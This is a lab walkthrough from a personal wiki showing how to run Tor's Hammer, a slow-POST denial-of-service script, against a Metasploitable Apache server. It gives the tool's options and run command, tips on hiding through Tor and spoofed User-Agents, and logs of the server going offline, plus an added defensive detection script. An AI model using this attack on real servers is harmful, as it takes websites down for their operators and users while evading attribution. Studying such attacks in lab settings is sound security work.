From charlesreid1

Tor's Hammer is a Python script for creating denial of service attacks on websites. It is designed to be used through the Tor traffic anonymization tool.

Tor's Hammer Slow Body DoS Attack

Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service (DoS). It does this by sending a POST request with a large declared Content-Length (like 1000 MB), then performing the following, ad infinitum: send one letter through the open connection; take a nap.

Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.
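Seen from the server side, the two paragraphs above say that source address and User-Agent are unreliable signals, so a check has to key on each connection's declared Content-Length and how fast the body actually arrives. The following is an added example, not part of the original page or of Tor's Hammer; the thresholds, the Conn record and the sample snapshots are assumptions constructed for illustration.

```python
from dataclasses import dataclass

# Policy values are assumptions chosen for this example, not taken from the page.
MAX_BODY = 10 * 1024 * 1024   # largest Content-Length the server will accept
GRACE_SECONDS = 20.0          # time allowed before the rate floor applies
MIN_RATE = 500.0              # body bytes/second a client must sustain


@dataclass
class Conn:
    conn_id: str
    declared_length: int   # Content-Length from the request headers
    body_received: int     # body bytes read so far
    body_elapsed: float    # seconds since the headers were complete


def verdict(c: Conn) -> str:
    """Classify one in-flight POST using only per-connection counters."""
    if c.declared_length > MAX_BODY:
        return "reject-too-large"      # refuse before a worker waits on the body
    if c.body_received >= c.declared_length:
        return "complete"
    # Each MIN_RATE bytes received buys one more second of waiting.
    allowed = GRACE_SECONDS + c.body_received / MIN_RATE
    return "drop-slow-body" if c.body_elapsed > allowed else "ok"


def triage(conns):
    """Map each connection id to its verdict."""
    return {c.conn_id: verdict(c) for c in conns}


def workers_freed(conns):
    """Count connections the policy would stop from holding a worker."""
    released = ("reject-too-large", "drop-slow-body")
    return sum(v in released for v in triage(conns).values())


# Constructed snapshots (not captured traffic).
SAMPLE = [
    Conn("A", 1_000_000_000, 42, 60.0),    # huge declared body, a trickle received
    Conn("B", 5_000_000, 30, 45.0),        # under the size cap, still a trickle
    Conn("C", 5_000_000, 2_000_000, 30.0), # ordinary upload in progress
    Conn("D", 512, 512, 0.2),              # small form post, finished
    Conn("E", 5_000_000, 10, 5.0),         # just started, inside the grace period
]

if __name__ == "__main__":
    for conn_id, v in triage(SAMPLE).items():
        print(conn_id, v)
```

Connection B shows why a size cap alone is not enough: its declared length is acceptable, and only the rate floor releases the worker it is holding.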

We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.

NOTE: This will completely knock out the target server. The web server will run out of memory and will begin to drop packets from the device. It must be rebooted to fix. Use wisely.

Python Script

To run this attack, use the torshammer.py script from the link above.

$ python torshammer.py

/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * Version 1.0 Beta
 * Anon-ymized via Tor
 */
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

Run this against the IP address of the Metasploitable machine, 10.0.0.27:

# python torshammer.py -t 10.0.0.27

This will run with the default number of threads (256).

Results

This works like a charm, bringing the target 10.0.0.27 to its knees:

[Image: TorsHammer.png]

Bingo!

Note that a large number of errors are printed:

error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-65:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-17:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__

However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.

Bringing Down The Server

Ping Down

At some point during the attack, the machine stopped responding to ping:

ping: sendto: Host is down
Request timeout for icmp_seq 874
ping: sendto: Host is down
Request timeout for icmp_seq 875
ping: sendto: Host is down
Request timeout for icmp_seq 876
ping: sendto: Host is down
Request timeout for icmp_seq 877
ping: sendto: Host is down
Request timeout for icmp_seq 878
ping: sendto: Host is down
Request timeout for icmp_seq 879
ping: sendto: Host is down
Request timeout for icmp_seq 880
ping: sendto: Host is down
Request timeout for icmp_seq 881
ping: sendto: Host is down
Request timeout for icmp_seq 882
ping: sendto: Host is down
Request timeout for icmp_seq 883
ping: sendto: Host is down
Request timeout for icmp_seq 884
ping: sendto: Host is down
Request timeout for icmp_seq 885
ping: sendto: Host is down
Request timeout for icmp_seq 886
ping: sendto: Host is down
Request timeout for icmp_seq 887
ping: sendto: Host is down
Request timeout for icmp_seq 888
ping: sendto: Host is down
Request timeout for icmp_seq 889
ping: sendto: Host is down
Request timeout for icmp_seq 890
ping: sendto: Host is down
Request timeout for icmp_seq 891
ping: sendto: Host is down
Request timeout for icmp_seq 892
Request timeout for icmp_seq 893
Request timeout for icmp_seq 894
Request timeout for icmp_seq 895
Request timeout for icmp_seq 896
Request timeout for icmp_seq 897
Request timeout for icmp_seq 898
Request timeout for icmp_seq 899
Request timeout for icmp_seq 900
Request timeout for icmp_seq 901
Request timeout for icmp_seq 902
Request timeout for icmp_seq 903
Request timeout for icmp_seq 904
Request timeout for icmp_seq 905
Request timeout for icmp_seq 906
Request timeout for icmp_seq 907

Memory Squeeze

Turns out, the machine ran out of memory, and the network device began dropping packets. This attack completely knocked the server offline, and it had to be rebooted:

[Image: TorsHammer OfflineMemSqueeze.png]

pwn

To be sure: this attack can pwn a server.
